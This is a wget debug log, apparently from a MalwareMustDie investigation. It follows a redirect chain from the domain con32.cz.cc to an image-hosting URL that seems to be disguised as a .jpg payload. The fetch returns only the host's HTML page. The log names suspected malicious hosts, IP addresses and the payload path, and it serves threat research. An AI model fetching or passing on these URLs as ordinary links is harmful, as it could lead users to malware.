- Resolving con32.cz.cc (con32.cz.cc)... 192.95.12.34
- Caching con32.cz.cc => 192.95.12.34
- Connecting to con32.cz.cc (con32.cz.cc)|192.95.12.34|:80... connected.
- GET /4L2nJG5VxX HTTP/1.1
- ---response begin---
- HTTP/1.1 302 Found
- Date: Tue, 26 Aug 2014 14:24:18 GMT
- Server: Apache/2.4.6 (Linux/SUSE)
- X-Powered-By: PHP/5.4.20
- Location: http://www.bilder-upload.eu/thumb/47f07e-1409060469.jpg/4L2nJG5VxX
- Content-Length: 0
- Keep-Alive: timeout=15, max=100
- Connection: Keep-Alive
- Content-Type: text/html; charset=UTF-8
- 302 Found
- Location: http://www.bilder-upload.eu/thumb/47f07e-1409060469.jpg/4L2nJG5VxX [following]
- --2014-08-26 23:25:21-- http://www.bilder-upload.eu/thumb/47f07e-1409060469.jpg/4L2nJG5VxX
- conaddr is: 192.95.12.34
- Resolving www.bilder-upload.eu (www.bilder-upload.eu)... 94.23.195.180
- Caching www.bilder-upload.eu => 94.23.195.180
- Found www.bilder-upload.eu in host_name_addresses_map (0x2880d1a0)
- Connecting to www.bilder-upload.eu (www.bilder-upload.eu)|94.23.195.180|:80... connected.
- ---response begin---
- HTTP/1.1 302 Found
- Date: Tue, 26 Aug 2014 14:25:22 GMT
- Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
- Location: http://www.bilder-upload.eu/
- Vary: Accept-Encoding
- Content-Length: 212
- Keep-Alive: timeout=15, max=100
- Connection: Keep-Alive
- Content-Type: text/html; charset=iso-8859-1
- 302 Found
- URI content encoding = 'iso-8859-1'
- Location: http://www.bilder-upload.eu/ [following]
- <html><head>
- <title>302 Found</title>
- </head><body>
- <h1>Found</h1>
- <p>The document has moved <a href="http://www.bilder-upload.eu/">here</a>.</p>
- </body></html>
- ] done.
- --2014-08-26 23:25:22-- http://www.bilder-upload.eu/
- Reusing existing connection to www.bilder-upload.eu:80.
- ---request begin---
- GET / HTTP/1.1
- Accept: */*
- Host: www.bilder-upload.eu
- Connection: Keep-Alive
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Date: Tue, 26 Aug 2014 14:25:22 GMT
- Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
- X-Powered-By: PHP/5.2.6-1+lenny16
- Set-Cookie: PHPSESSID=2f47551d255e0b695257fc022a155c0a; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Keep-Alive: timeout=15, max=99
- Connection: Keep-Alive
- Transfer-Encoding: chunked
- Content-Type: text/html
- 200 OK
- Stored cookie www.bilder-upload.eu -1 (ANY) / <session> <insecure> [expiry none] PHPSESSID 2f47551d255e0b695257fc022a155c0a
- Length: unspecified [text/html]
- Saving to: '4L2nJG5VxX'
- 2014-08-26 23:25:23 (31.1 KB/s) - '4L2nJG5VxX' saved [8464]
- #
- # The download returned the bilder-upload.eu HTML page (text/html, 8464 bytes), not the payload binary; excerpt:
- #
- >Mit dem hochladen der Datei akzeptieren Sie unsere AGB.<
- </form>
- ----
- #MalwareMustDie!